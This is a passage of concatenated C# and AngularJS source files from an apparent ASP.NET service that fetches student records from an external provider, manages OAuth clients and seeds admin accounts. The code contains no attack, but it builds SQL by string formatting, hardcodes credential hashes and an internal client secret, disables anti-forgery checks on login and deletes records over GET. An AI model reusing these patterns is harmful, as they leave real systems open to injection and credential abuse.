Encoding.UTF8.GetString(result); var token = JsonConvert.DeserializeObject<Token>(jsonData); return token; } catch (WebException ex) { if (((HttpWebResponse)ex.Response).StatusCode == HttpStatusCode.BadRequest) { throw new WebException("Failed to request access token. 
Check you OAuth credentials."); } } return null; } public Token RefreshToken(Token token = null) { if (token == null) { token = GetToken(); } if (token == null || string.IsNullOrWhiteSpace(token.RefreshToken)) { return null; } // web client var client = new System.Net.WebClient(); // add headers client.Headers.Add("Content-Type", "application/x-www-form-urlencoded"); string credentials = Convert.ToBase64String( Encoding.ASCII.GetBytes(string.Format("{0}:{1}", _credentials.ClientId, _credentials.ClientSecret))); client.Headers[HttpRequestHeader.Authorization] = string.Format("Basic {0}", credentials); // refresh token request doesn't need "username" and "password" var postVaules = new NameValueCollection { {"grant_type", GrantTpype.RefreshToken}, {"refresh_token", token.RefreshToken} }; try { byte[] result = client.UploadValues(TokenUrl, "POST", postVaules); var jsonData = Encoding.UTF8.GetString(result); var refreshToken = JsonConvert.DeserializeObject<Token>(jsonData); return refreshToken; } catch (WebException ex) { if (((HttpWebResponse)ex.Response).StatusCode == HttpStatusCode.BadRequest) { throw new WebException("Failed to request access token"); } } return null; } #endregion #region private methods private ResponseData<ChildInfo> GetStudentsByEndpoint(Uri serviceUri, Token token) { // web client var client = new System.Net.WebClient(); client.Headers["Content-type"] = "application/json"; client.Headers[HttpRequestHeader.Authorization] = string.Format("{0} {1}", TokenType, token.AccessToken); try { return DownloadStudents(serviceUri, client); } catch (WebException wex) { if (((HttpWebResponse)wex.Response).StatusCode == HttpStatusCode.Unauthorized) { // validate token failed, need to refresh token token = RefreshToken(token); client.Headers[HttpRequestHeader.Authorization] = string.Format("{0} {1}", TokenType, token.AccessToken); return DownloadStudents(serviceUri, client); ; } } return null; } private static ResponseData<ChildInfo> DownloadStudents(Uri 
serviceUri, System.Net.WebClient client) { // invoke the REST method var jsonData = client.DownloadString(serviceUri); var responseData = JsonConvert.DeserializeObject<ResponseData<ChildInfo>>(jsonData); return responseData; } private Uri GetUri(string baseAddress, string endpoint = "") { try { var baseUri = new Uri(baseAddress); return new Uri(baseUri, endpoint); } catch (UriFormatException ex) { throw new Exception(string.Format("Please check the format of BaseUri or Endpoint"), ex); } } #endregion } } <file_sep>using System; using System.Collections.Generic; using System.Linq; using System.Web; using System.Web.Mvc; using PCG.GOAL.WebService.Security; namespace PCG.GOAL.WebService.Controllers { [MvcAuthorize] public class HomeController : Controller { public ActionResult Index() { ViewBag.Title = "Home Page"; return View(); } public ActionResult Test() { return View("Index"); } } } <file_sep>using System.Threading.Tasks; using Microsoft.VisualStudio.TestTools.UnitTesting; using Moq; using PCG.GOAL.Common.Models; using PCG.GOAL.Common.WebModels; using PCG.GOAL.ExternalDataService.Interface; using PCG.GOAL.WebService.Controllers; namespace PCG.GOAL.WebService.Test.Controllers { [TestClass()] public class RethinkControllerTest { private Mock<IGoalService> _rethinkServiceMock; private RethinkController _rethinkController; [TestInitialize] public void TestInitialize() { _rethinkServiceMock = new Mock<IGoalService>(); _rethinkServiceMock.SetupGet(x => x.ServiceConfig).Returns(new ServiceConfig()); _rethinkController = new RethinkController(_rethinkServiceMock.Object); } [TestMethod()] public void GetTest() { _rethinkServiceMock.Setup(x => x.GetAllStudentsAsync()).Returns(GetResponse); var response = _rethinkController.Get(); _rethinkServiceMock.Verify(x=>x.GetAllStudentsAsync()); Assert.IsNotNull(response); } [TestMethod()] public void GetByStateTestNumberTest() { _rethinkServiceMock.Setup(x => x.GetStudentByStateNumberAsync(It.IsAny<string>())).Returns(GetResponse); 
var response = _rethinkController.GetByStateTestNumber(""); _rethinkServiceMock.Verify(x => x.GetStudentByStateNumberAsync("")); Assert.IsNotNull(response); } [TestMethod()] public void GetByIdentityTest() { _rethinkServiceMock.Setup(x => x.GetStudentByIdentityAsync(It.IsAny<string>(),It.IsAny<string>(),It.IsAny<string>())).Returns(GetResponse); var response = _rethinkController.GetByIdentity("", "", ""); _rethinkServiceMock.Verify(x => x.GetStudentByIdentityAsync("","","")); Assert.IsNotNull(response); } private Task<ResponseData<ChildInfo>> GetResponse() { var response = new Task<ResponseData<ChildInfo>>(() => new ResponseData<ChildInfo>()); return response; } } } <file_sep>using System; using System.Security.Policy; using PCG.GOAL.Common.DataAccess; using PCG.GOAL.Common.WebModels; using PCG.GOAL.ExternalDataService.Service; namespace PCG.GOAL.WebService { public class DbConfig { private const string HashInternal = "ADBx61Nqj+eqoVtXgTsp9bQ/UMZUpUovP0CLPL6rLYWavrE5pndozRPzhy/vDtGlKQ=="; private const string HashAdmin = "AG7Bxc/IpGq5SXqQDIN26kNbr4Y+jgw9GhfQ26XUls0nYWgoclLDslM9IDKTenBQ5w=="; private const string HashGoalView = "AFuLeuok3BFeogvkeFZwHAZEDbq5D/5UUaaladYFceKILn2QoWAZ6/VSk1Wjf6kFrw=="; private const string RoleAdmin = "Admin"; private const string GoalInternal = "goal_internal"; public static void Seeding() { try { // goal_internal var dbService = new DbService(new SqlDataAccess()); var user = dbService.GetCredentials(GoalInternal); if (user != null) { user.Password = <PASSWORD>; user.Role = "Admin"; dbService.UpdateCredentials(user); } else { dbService.AddCredentials(new Credentials { Username = GoalInternal, Password = <PASSWORD>, Role = RoleAdmin }); } // admin user = dbService.GetCredentials("admin"); if (user != null && user.Role != RoleAdmin) { user.Role = RoleAdmin; dbService.UpdateCredentials(user); } else if(user==null) { dbService.AddCredentials(new Credentials { Username = "admin", Password = <PASSWORD>, Role = RoleAdmin }); } // 
goal_internal var client = dbService.GetClientInfo(GoalInternal); if (client != null) { client.ClientSecret = <PASSWORD>; dbService.UpdateClientInfo(client); } else { dbService.AddClientInfo(new ClientInfo { ClientId = GoalInternal, ClientSecret = HashInternal }); } // goal_internal client = dbService.GetClientInfo("goalview"); if (client == null) { dbService.AddClientInfo(new ClientInfo { ClientId = "goalview", ClientSecret = HashGoalView }); } } catch (Exception e) { throw; } } public static string GetInternalToken(string baseUri) { var client = new WebServiceClient<string> { Credentials = new Credentials { ClientId = GoalInternal, ClientSecret = GoalInternal, Username = GoalInternal, Password = <PASSWORD> }, BaseUri = baseUri, TokenEndpoint = "token" }; return client.GetToken(); } } }<file_sep>using System; using System.Collections.Generic; using System.Data; using System.Linq; using PCG.GOAL.Common.Interface; using PCG.GOAL.Common.WebModels; namespace PCG.GOAL.Common.DataAccess { public class DbService : IDbService { private readonly ISqlDataAccess _sqlDataAccess; private const string GoalInternal = "goal_internal"; #region Constructor public DbService(ISqlDataAccess sqlDataAccess) { _sqlDataAccess = sqlDataAccess; } #endregion #region Credentials public IEnumerable<Credentials> GetAllCredentials() { var sqlStatement = string.Format("SELECT * FROM ServiceUser"); try { using (var credentialsTable = _sqlDataAccess.GetTableBySql(sqlStatement)) { var data = credentialsTable.AsEnumerable().Select(r => new Credentials { Id = (int)r["id"], Username = (string)r["username"], Password = (string)r["<PASSWORD>"], Role = r["role"] == DBNull.Value ? 
string.Empty : (string)r["role"]
                    });
                    return data.Where(c => c.Username != GoalInternal).ToList();
                }
            }
            catch (Exception)
            {
                // TODO: log the failure; the bare rethrow preserves the original stack trace.
                throw;
            }
        }

        /// <summary>
        /// Loads a single service user by primary key, or null when no row matches.
        /// </summary>
        public Credentials GetCredentialsById(int id)
        {
            // id is a typed int parameter, so it cannot carry SQL metacharacters;
            // emit it unquoted so the predicate stays numeric.
            var sqlStatement = string.Format("SELECT * FROM ServiceUser WHERE id = {0}", id);
            using (var credentialsTable = _sqlDataAccess.GetTableBySql(sqlStatement))
            {
                return credentialsTable.AsEnumerable().Select(MapCredentials).FirstOrDefault();
            }
        }

        /// <summary>
        /// Loads a single service user by username, or null when no row matches.
        /// </summary>
        public Credentials GetCredentials(string username)
        {
            // username originates from login input: double any single quotes so the
            // value cannot terminate the literal (SQL injection).
            var sqlStatement = string.Format("SELECT * FROM ServiceUser WHERE USERNAME = '{0}'",
                EscapeSqlLiteral(username));
            using (var credentialsTable = _sqlDataAccess.GetTableBySql(sqlStatement))
            {
                return credentialsTable.AsEnumerable().Select(MapCredentials).FirstOrDefault();
            }
        }

        /// <summary>
        /// Inserts a new service user row. The password is expected to be hashed by the caller.
        /// </summary>
        public void AddCredentials(Credentials credentials)
        {
            var sqlStatement = string.Format(
                "INSERT INTO ServiceUser (username, password, role) VALUES ('{0}','{1}','{2}')",
                EscapeSqlLiteral(credentials.Username),
                EscapeSqlLiteral(credentials.Password),
                EscapeSqlLiteral(credentials.Role));
            try
            {
                _sqlDataAccess.ExecuteNonQuery(sqlStatement);
            }
            catch (Exception)
            {
                // TODO: log the failure before rethrowing.
                throw;
            }
        }

        /// <summary>
        /// Updates an existing service user row identified by credentials.Id.
        /// </summary>
        public void UpdateCredentials(Credentials credentials)
        {
            var sqlStatement = string.Format(
                "UPDATE ServiceUser SET username = '{0}', password = '{1}', role = '{2}' WHERE id = {3} ",
                EscapeSqlLiteral(credentials.Username),
                EscapeSqlLiteral(credentials.Password),
                EscapeSqlLiteral(credentials.Role),
                credentials.Id);
            try
            {
                _sqlDataAccess.ExecuteNonQuery(sqlStatement);
            }
            catch (Exception)
            {
                // TODO: log the failure before rethrowing.
                throw;
            }
        }

        /// <summary>
        /// Deletes the service user row with the given primary key.
        /// </summary>
        public void DeleteCredentials(int id)
        {
            var sqlStatement = string.Format("DELETE FROM ServiceUser WHERE id = {0}", id);
            try
            {
                _sqlDataAccess.ExecuteNonQuery(sqlStatement);
            }
            catch (Exception)
            {
                // TODO: log the failure before rethrowing.
                throw;
            }
        }

        #endregion

        #region ClientInfo

        /// <summary>
        /// Returns all registered client applications except the internal GOAL client.
        /// </summary>
        public IEnumerable<ClientInfo> GetAllClientInfo()
        {
            var sqlStatement = "SELECT * FROM ServiceClient";
            try
            {
                using (var credentialsTable = _sqlDataAccess.GetTableBySql(sqlStatement))
                {
                    var data = credentialsTable.AsEnumerable().Select(MapClientInfo);
                    // The internal client is infrastructure and must never be listed for editing.
                    return data.Where(c => c.ClientId != GoalInternal).ToList();
                }
            }
            catch (Exception)
            {
                // TODO: log the failure before rethrowing.
                throw;
            }
        }

        /// <summary>
        /// Loads a single client application by primary key, or null when no row matches.
        /// </summary>
        public ClientInfo GetClientInfoById(int id)
        {
            var sqlStatement = string.Format("SELECT * FROM ServiceClient WHERE id = {0}", id);
            using (var credentialsTable = _sqlDataAccess.GetTableBySql(sqlStatement))
            {
                return credentialsTable.AsEnumerable().Select(MapClientInfo).FirstOrDefault();
            }
        }

        /// <summary>
        /// Loads a single client application by its client id, or null when no row matches.
        /// </summary>
        public ClientInfo GetClientInfo(string clientId)
        {
            var sqlStatement = string.Format("SELECT * FROM ServiceClient WHERE CLIENTID = '{0}'",
                EscapeSqlLiteral(clientId));
            using (var credentialsTable = _sqlDataAccess.GetTableBySql(sqlStatement))
            {
                return credentialsTable.AsEnumerable().Select(MapClientInfo).FirstOrDefault();
            }
        }

        /// <summary>
        /// Inserts a new client application row. ClientSecret is expected to be hashed by the caller.
        /// </summary>
        public void AddClientInfo(ClientInfo clientInfo)
        {
            var sqlStatement = string.Format(
                "INSERT INTO ServiceClient (clientid, clientsecret, description) VALUES ('{0}','{1}','{2}')",
                EscapeSqlLiteral(clientInfo.ClientId),
                EscapeSqlLiteral(clientInfo.ClientSecret),
                EscapeSqlLiteral(clientInfo.Description));
            try
            {
                _sqlDataAccess.ExecuteNonQuery(sqlStatement);
            }
            catch (Exception)
            {
                // TODO: log the failure before rethrowing.
                throw;
            }
        }

        /// <summary>
        /// Updates an existing client application row identified by clientInfo.Id.
        /// </summary>
        public void UpdateClientInfo(ClientInfo clientInfo)
        {
            var sqlStatement = string.Format(
                "UPDATE ServiceClient SET clientid = '{0}', clientsecret = '{1}', description = '{2}' WHERE id = {3} ",
                EscapeSqlLiteral(clientInfo.ClientId),
                EscapeSqlLiteral(clientInfo.ClientSecret),
                EscapeSqlLiteral(clientInfo.Description),
                clientInfo.Id);
            try
            {
                _sqlDataAccess.ExecuteNonQuery(sqlStatement);
            }
            catch (Exception)
            {
                // TODO: log the failure before rethrowing.
                throw;
            }
        }

        /// <summary>
        /// Deletes the client application row with the given primary key.
        /// </summary>
        public void DeleteClientInfo(int id)
        {
            var sqlStatement = string.Format("DELETE FROM ServiceClient WHERE id = {0}", id);
            try
            {
                _sqlDataAccess.ExecuteNonQuery(sqlStatement);
            }
            catch (Exception)
            {
                // TODO: log the failure before rethrowing.
                throw;
            }
        }

        #endregion

        #region Helpers

        /// <summary>
        /// Doubles single quotes so a value cannot terminate a SQL string literal.
        /// NOTE(review): this is the strongest defence available here because the
        /// ISqlDataAccess surface only accepts SqlParameter lists for stored
        /// procedures; switch to true parameterised statements if that surface grows.
        /// </summary>
        private static string EscapeSqlLiteral(string value)
        {
            return value == null ? null : value.Replace("'", "''");
        }

        /// <summary>Maps a ServiceUser row to a Credentials instance.</summary>
        private static Credentials MapCredentials(DataRow r)
        {
            return new Credentials
            {
                Id = (int)r["id"],
                Username = (string)r["username"],
                // NOTE(review): column name appears redacted in source — verify against schema.
                Password = (string)r["<PASSWORD>"],
                Role = r["role"] == DBNull.Value ? string.Empty : (string)r["role"]
            };
        }

        /// <summary>Maps a ServiceClient row to a ClientInfo instance.</summary>
        private static ClientInfo MapClientInfo(DataRow r)
        {
            return new ClientInfo
            {
                Id = (int)r["id"],
                ClientId = (string)r["clientid"],
                ClientSecret = (string)r["clientsecret"],
                Description = r["Description"] == DBNull.Value ? string.Empty : (string)r["Description"]
            };
        }

        #endregion
    }
}<file_sep>using System.Collections.Generic;
using System.Threading.Tasks;
using PCG.GOAL.Common.Models;
using PCG.GOAL.Common.WebModels;

namespace PCG.GOAL.ExternalDataService.Interface
{
    /// <summary>
    /// Abstraction over the external GOAL student-data provider (Rethink).
    /// </summary>
    public interface IGoalService
    {
        Credentials Credentials { get; set; }
        IServiceConfig ServiceConfig { get; set; }

        Task<ResponseData<ChildInfo>> GetAllStudentsAsync();
        Task<ResponseData<ChildInfo>> GetStudentByStateNumberAsync(string stateTestNumber);
Task<ResponseData<ChildInfo>> GetStudentByIdentityAsync(string firstName, string lastName, string dob); } } <file_sep>using System.Net.Http; using System.Threading.Tasks; using PCG.GOAL.ExternalDataService.Interface; namespace PCG.GOAL.ExternalDataService.Service { public class Content<T> : IContent where T : class { public HttpContent HttpContent { get; set; } public Task<string> ReadAsStringAsync() { return HttpContent.ReadAsStringAsync(); } } }<file_sep>using System; using System.Net; using System.Web.Mvc; namespace PCG.GOAL.WebService.Security { [AttributeUsage(AttributeTargets.Class | AttributeTargets.Method, Inherited = true, AllowMultiple = true)] public class MvcAuthorizeAttribute : AuthorizeAttribute { protected override void HandleUnauthorizedRequest(AuthorizationContext filterContext) { if (filterContext.HttpContext.Request.IsAuthenticated) { filterContext.Result = new HttpStatusCodeResult((int)HttpStatusCode.Forbidden); } else { base.HandleUnauthorizedRequest(filterContext); } } } }<file_sep>using System; using System.Net; using System.Net.Http; using System.Net.Http.Headers; using System.Threading.Tasks; using PCG.GOAL.ExternalDataService.Interface; namespace PCG.GOAL.ExternalDataService.Service { public class Client<T> :IClient where T : class { public HttpClient HttpClient { get; set; } public HttpRequestHeader DefaultRequestHeaders { get; set; } public Client() { HttpClient=new HttpClient(); } public void SetAuthorization(AuthenticationHeaderValue header) { HttpClient.DefaultRequestHeaders.Authorization = header; } public void SetMediaType(MediaTypeWithQualityHeaderValue mediaType) { HttpClient.DefaultRequestHeaders.Accept.Add(mediaType); } public Task<HttpResponseMessage> GetAsync(Uri uri) { return HttpClient.GetAsync(uri); } public Task<HttpResponseMessage> PostAsync(Uri uri, HttpContent content) { return HttpClient.PostAsync(uri, content); } public Task<HttpResponseMessage> PutAsync(Uri uri, HttpContent content) { return HttpClient.PutAsync(uri, 
content); } } }<file_sep>using System; using System.Linq; using System.Linq.Expressions; using System.Threading.Tasks; namespace DataAccess.Common.Interfaces { public interface IRepository<T> where T : class { IQueryable<T> GetAll(); T GetById(int id); void Add(T entity); void Update(T entity); void Delete(T entity); void Delete(int id); IQueryable<T> Find(Expression<Func<T, bool>> where, params Expression<Func<T, object>>[] includeProperties); T Single(Expression<Func<T, bool>> where, params Expression<Func<T, object>>[] includeProperties); T First(Expression<Func<T, bool>> where, params Expression<Func<T, object>>[] includeProperties); Task<T> FirstAsync(Expression<Func<T, bool>> where, params Expression<Func<T, object>>[] includeProperties); } } <file_sep>(function () { angular.module('webServices') .controller('appAdminCtrl', ['$rootScope', '$scope', 'dataContext', '$state', '$stateParams', 'logService','dialogService', appAdminCtrl]); function appAdminCtrl($rootScope, $scope, dataContext, $state, $stateParams, logService, dialogService) { $scope.isFromEdit = true; $scope.hasApp = false; $scope.isEditMode = ($state.current.name !== 'clientApp'); $scope.backToAdmin = backToAdmin; $scope.deleteApp = deleteApp; $scope.saveApp = saveApp; // -- main function (function () { if ($scope.isEditMode && $stateParams.id) { getAppById($stateParams.id); $scope.title = 'Edit Application'; } else { $scope.title = 'Add Applications'; } resetApp(); getApps(); })(); // -- functions function backToAdmin() { $state.go("clientApp"); } function saveApp(formApp) { if (!formApp.$invalid) { dataContext.saveApp($scope.app) .success(function (data) { if (data.error) { toastr.warning(data.error.message); } else { getApps(); resetApp(); if ($scope.isEditMode) { $state.go('clientApp'); } toastr.success("Saved Successfully"); } }) .error(function (data, status, headers, config) { logService.logError(data); }); } else { toastr.warning("Please correct the validation errors"); } }; function 
getApps() { dataContext.getApps().success(function (data) { if (data && data.data) { $scope.appList = data.data; $scope.hasApp = $scope.appList.length > 0; } }); resetApp(); } function getAppById(id) { dataContext.getAppById(id) .success(function (data) { if (data && data.data) { $scope.app = data.data[0]; $scope.app.clientSecret = ''; $scope.app.isImportant = true; } }) .error(function (data, status, headers, config) { logService.logError(data); }); } function deleteApp(id) { dialogService.confirmModal("Delete", "Are you sure to delete this client?", funcDeleteClient); function funcDeleteClient() { dataContext.deleteApp(id).success(function (data) { getApps(); if (data && data.done === false) { toastr.error(data.message); } }).error(function (data, status, headers, config) { logService.logError(data); }); } } function resetApp() { $scope.app = { appName: '', clientId: '', clientSecret: '', description: '' }; } } })();<file_sep>namespace PCG.GOAL.Common.WebModels { public static class GrantTpype { public static string Password { get { return "<PASSWORD>"; } } public static string RefreshToken { get { return "refresh_token"; } } } } <file_sep>using System.Security.Claims; using System.Web; using System.Web.Helpers; using System.Web.Mvc; using Microsoft.AspNet.Identity; using Microsoft.Owin.Security; using PCG.GOAL.Common.Interface; using PCG.GOAL.Common.WebModels; using PCG.GOAL.WebService.Models; namespace PCG.GOAL.WebService.Controllers { public class AuthenticationController : Controller { IAuthenticationManager Authentication { get { return HttpContext.GetOwinContext().Authentication; } } private readonly IOAuthValidator _oAuthValidator; public AuthenticationController(IOAuthValidator oAuthValidator) { _oAuthValidator = oAuthValidator; } [HttpGet] public ActionResult Login() { return View(); } [HttpPost] //[ValidateAntiForgeryToken] public ActionResult Login(LoginModel input) { if (ModelState.IsValid) { var credentials = 
_oAuthValidator.ValidateUser(input.Username, input.Password); if (credentials != null) { var password = <PASSWORD>.Hash<PASSWORD>(input.Password); var user = new Credentials { Username = input.Username, Password = <PASSWORD>, Role = credentials.Role }; var identity = new ClaimsIdentity(new[] { new Claim(ClaimTypes.Name, input.Username), new Claim(ClaimTypes.Role, user.Role) }, DefaultAuthenticationTypes.ApplicationCookie, ClaimTypes.Name, ClaimTypes.Role); // tell OWIN the identity provider, optional // identity.AddClaim(new Claim(IdentityProvider, "Simplest Auth")); Authentication.SignIn(new AuthenticationProperties { IsPersistent = input.RememberMe }, identity); return RedirectToAction("Index", "Home"); } ViewBag.LoginFailed = true; } return View("Login"); //return RedirectToAction("login"); } public ActionResult Logout() { Authentication.SignOut(DefaultAuthenticationTypes.ApplicationCookie); return RedirectToAction("login"); } } } <file_sep>using System; using System.Collections.Generic; using System.Linq; using System.Net.Http; using System.Text; using System.Threading.Tasks; namespace PCG.GOAL.ExternalDataService.Interface { public interface IContent { Task<string> ReadAsStringAsync(); HttpContent HttpContent { get; set; } } } <file_sep>namespace PCG.GOAL.Common.Models { public class LessonObjective { public string ObjectiveText { get; set; } public LessonMasteryCriteria MasteryCriteria { get; set; } } }<file_sep>using System.Collections.Generic; using System.Data; using System.Data.SqlClient; namespace PCG.GOAL.Common.Interface { public interface ISqlDataAccess { SqlDataReader GetReaderBySql(string sqlStatement, bool closeConnection = true); SqlDataReader GetReader(string storedProcedureKey, List<SqlParameter> parameters, bool closeConnection = true); object GetScalar(string storedProcedureKey, List<SqlParameter> parameters, bool closeConnection = true); object GetScalar(string sqlStatement, bool closeConnection = true); int ExecuteNonQuery(string 
storedProcedureKey, List<SqlParameter> parameters, bool closeConnection = true); int ExecuteNonQuery(string sqlStatement, bool closeConnection = true); DataTable GetTableBySql(string sqlStatement, bool closeConnection = true); } }<file_sep>using System.Collections.Generic; namespace PCG.GOAL.Common.Models { public class ChildInfo { public int Id { get; set; } public string FirstName { get; set; } public string LastName { get; set; } public string DateOfBirth { get; set; } public string Grade { get; set; } public string Gender { get; set; } public string[] EducationalClassification { get; set; } public string LanguageAbility { get; set; } public string StateTestNumber { get; set; } public List<LessonInfo> Lessons { get; set; } public List<BehaviorInfo> Behaviors { get; set; } public string AreaOfConcern { get; set; } } }<file_sep>using System; using System.Collections.Generic; using System.Linq; using System.Web.Helpers; using System.Web.Http; using PCG.GOAL.Common.Interface; using PCG.GOAL.Common.WebModels; using PCG.GOAL.WebService.Security; namespace PCG.GOAL.WebService.Controllers { [ApiAuthorize(Roles = "Admin")] public class ServiceAdminController : ApiController { private readonly IDbService _dbService; public ServiceAdminController(IDbService dbService) { _dbService = dbService; } #region Credentials [Route("api/admin/credentials")] public IHttpActionResult GetCredentials() { try { var users = _dbService.GetAllCredentials(); return Ok(new ResponseData<Credentials> { Data = users.ToList(), Done = true }); } catch (Exception e) { return Ok(new ResponseData<Credentials> { Data = null, Done = false, Message = e.Message }); } } [Route("api/admin/credentials/{id}")] [HttpGet] public IHttpActionResult GetCredentialsById(int id) { try { var user = _dbService.GetCredentialsById(id); if (user != null) { return Ok(new ResponseData<Credentials> { Data = new List<Credentials> { user }, Done = true }); } else { return Ok(new ResponseData<Credentials> { Data = null, Done = 
false }); } } catch (Exception e) { return Ok(new ResponseData<Credentials> { Data = null, Done = false, Message = e.Message }); } } [Route("api/admin/DeleteCredentials/{id}")] [HttpGet] public IHttpActionResult DeleteCredentialsById(int id) { try { var user = _dbService.GetCredentialsById(id); if (user.Username.ToLower() == "admin") { return Ok(new ResponseData<Credentials> { Data = null, Done = false, Message = "Cannot delete Admin!" }); } _dbService.DeleteCredentials(id); return Ok(new ResponseData<Credentials> { Data = null, Done = true }); } catch (Exception e) { return Ok(new ResponseData<Credentials> { Data = null, Done = false, Message = e.Message }); } } [HttpPost] [Route("api/admin/AddCredentials")] public IHttpActionResult SaveCredentials(Credentials credentials) { if (ModelState.IsValid) { try { var isInsert = credentials.Id == 0; credentials.Password = Crypto.HashPassword(credentials.Password); if (isInsert) { _dbService.AddCredentials(credentials); } else { _dbService.UpdateCredentials(credentials); } return Ok(new ResponseData<Credentials> { Data = new List<Credentials> { credentials }, Done = true }); } catch (Exception ex) { return Ok(new ResponseData<Credentials> { Data = null, Done = false, Message = ex.Message }); } } return Ok(new ResponseData<Credentials> { Data = null, Done = false, Message = "Model invalid" }); } #endregion #region ApiAppRegistrations [Route("api/admin/apps")] public IHttpActionResult GetApps() { try { var apps = _dbService.GetAllClientInfo(); return Ok(new ResponseData<ClientInfo> { Data = apps.ToList(), Done = true }); } catch (Exception e) { return Ok(new ResponseData<ClientInfo> { Data = null, Done = false, Message = e.Message }); } } [HttpPost] [Route("api/admin/addapp")] public IHttpActionResult SaveClient(ClientInfo clientInfo) { if (ModelState.IsValid) { try { var isInsert = clientInfo.Id == 0; clientInfo.ClientSecret = Crypto.HashPassword(clientInfo.ClientSecret); if (isInsert) { 
_dbService.AddClientInfo(clientInfo); } else { _dbService.UpdateClientInfo(clientInfo); } return Ok(new ResponseData<ClientInfo> { Data = new List<ClientInfo> { clientInfo }, Done = true }); } catch (Exception ex) { return Ok(new ResponseData<ClientInfo> { Data = null, Done = false, Message = ex.Message }); } } return Ok(new ResponseData<ClientInfo> { Data = null, Done = false, Message = "Model invalid" }); } [Route("api/admin/deleteapp/{id}")] [HttpGet] public IHttpActionResult DeleteAppById(int id) { try { //var client = _dbService.GetClientInfoById(id); _dbService.DeleteClientInfo(id); return Ok(new ResponseData<ClientInfo> { Data = null, Done = true }); } catch (Exception e) { return Ok(new ResponseData<ClientInfo> { Data = null, Done = false, Message = e.Message }); } } [Route("api/admin/app/{id}")] [HttpGet] public IHttpActionResult GetAppById(int id) { try { var client = _dbService.GetClientInfoById(id); if (client != null) { return Ok(new ResponseData<ClientInfo> { Data = new List<ClientInfo> { client }, Done = true }); } return Ok(new ResponseData<ClientInfo> { Data = null, Done = false }); } catch (Exception e) { return Ok(new ResponseData<ClientInfo> { Data = null, Done = false, Message = e.Message }); } } #endregion } } <file_sep>namespace PCG.GOAL.Common.Models { public class LessonMasteryCriteria { public string MinimumNoOfTrials { get; set; } public string ConsecutiveSessions { get; set; } public string SuccessPercentage { get; set; } } } <file_sep>using System; using System.Configuration; using System.Threading.Tasks; using System.Web.Http; using PCG.GOAL.Common.Models; using PCG.GOAL.Common.WebModels; using PCG.GOAL.ExternalDataService.Interface; using PCG.GOAL.WebService.Security; namespace PCG.GOAL.WebService.Controllers { [ApiAuthorize] public class RethinkController : ApiController { private readonly IGoalService _rethinkService; public RethinkController(IGoalService rethinkService) { _rethinkService = rethinkService; } 
        /// <summary>
        /// GET api/rethink/student — returns every student from the Rethink service.
        /// </summary>
        [Route("api/rethink/student")]
        [HttpGet]
        public async Task<ResponseData<ChildInfo>> Get()
        {
            return await _rethinkService.GetAllStudentsAsync();
        }

        /// <summary>
        /// GET api/rethink/StudentByStatetestnumber — looks a single student up by state test number.
        /// </summary>
        [Route("api/rethink/StudentByStatetestnumber")]
        [HttpGet]
        public async Task<ResponseData<ChildInfo>> GetByStateTestNumber(string statetestnumber)
        {
            return await _rethinkService.GetStudentByStateNumberAsync(statetestnumber);
        }

        /// <summary>
        /// GET api/rethink/StudentByIdentity — looks a single student up by name and date of birth.
        /// NOTE(review): the downstream service appears to expect dob in YYYYMMDD format — confirm with callers.
        /// </summary>
        [Route("api/rethink/StudentByIdentity")]
        [HttpGet]
        public async Task<ResponseData<ChildInfo>> GetByIdentity(string firstName, string lastName, string dob)
        {
            return await _rethinkService.GetStudentByIdentityAsync(firstName, lastName, dob);
        }
    }
}
<file_sep>using System.Threading.Tasks;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using Moq;
using PCG.GOAL.Common.Models;
using PCG.GOAL.Common.WebModels;
using PCG.GOAL.ExternalDataService.Interface;
using PCG.GOAL.ExternalDataService.Service;

namespace PCG.GOAL.WebService.Test.Service
{
    // Unit tests for RethinkGoalService; the underlying web-service client is mocked.
    [TestClass()]
    public class RethinkGoalServiceTests
    {
        public Mock<IWebServiceClient<ChildInfo>> ApiClientMock { get; set; }
        private IServiceConfig _serviceConfig;
        public RethinkGoalService GoalService { get; set; }

        // Builds a fresh service wired to a mocked API client before each test.
        [TestInitialize]
        public void RethinkGoalServiceTest()
        {
            _serviceConfig= new ServiceConfig{ApiKey = "key",BaseUrl = "http://base.com",ServiceEndpoint = "service",TokenEndpoint = "token"};
            ApiClientMock= new Mock<IWebServiceClient<ChildInfo>>();
            ApiClientMock.Setup(x => x.GetAsync(null)).Returns(GetResponse);
            GoalService = new RethinkGoalService(ApiClientMock.Object, _serviceConfig);
            GoalService.ServiceConfig=new ServiceConfig();
        }

        [TestMethod()]
        public void GetAllChildrenAsyncTest()
        {
            // Act
            var responsData = GoalService.GetAllStudentsAsync();
            // Assert
            ApiClientMock.Verify(x=>x.GetAsync(null));
            Assert.IsNotNull(responsData);
        }

        [TestMethod()]
        public void GetAllChildByStateNumberAsyncTest()
        {
            // Act
            var responsData = GoalService.GetStudentByStateNumberAsync(stateTestNumber:"");
            // Assert
            ApiClientMock.Verify(x => x.GetAsync(null));
Assert.IsNotNull(responsData); } [TestMethod()] public void GetAllChildByIdentityAsyncTest() { // Act var responsData = GoalService.GetStudentByIdentityAsync(firstName:"",lastName:"",dob:""); // Assert ApiClientMock.Verify(x => x.GetAsync(null)); Assert.IsNotNull(responsData); } private Task<ResponseData<ChildInfo>> GetResponse() { var response = new Task<ResponseData<ChildInfo>>(()=>new ResponseData<ChildInfo>()); return response; } } } <file_sep>using System; using System.Collections.Generic; using System.Net; using System.Net.Http; using System.Threading.Tasks; using Microsoft.VisualStudio.TestTools.UnitTesting; using Moq; using Newtonsoft.Json; using PCG.GOAL.Common.Models; using PCG.GOAL.Common.WebModels; using PCG.GOAL.ExternalDataService.Interface; using PCG.GOAL.ExternalDataService.Service; namespace PCG.GOAL.WebService.Test.Service { [TestClass()] public class WebServiceClientTests { private Mock<IClient> _httpClientMock; private Mock<IContent> _responseContentMock; IWebServiceClient<ChildInfo> WebServiceClient { get; set; } [TestInitialize] public void TestInitialize() { _httpClientMock = new Mock<IClient>(); _responseContentMock = new Mock<IContent>(); WebServiceClient = new WebServiceClient<ChildInfo>(_httpClientMock.Object, _responseContentMock.Object); WebServiceClient.Credentials = new Credentials { Username = "admin", Password = "<PASSWORD>", ClientId = "goalview", ClientSecret = "goalview" }; WebServiceClient.BaseUri = "http://localhost"; WebServiceClient.TokenEndpoint = "/token"; } [TestMethod()] public void GetTokenTest() { // Arrange _responseContentMock.Setup(x => x.ReadAsStringAsync()).Returns(GetToken); _httpClientMock.Setup(x => x.PostAsync(It.IsAny<Uri>(), It.IsAny<HttpContent>())).Returns(GetResponse); // Act var token = WebServiceClient.GetToken(); // Assert 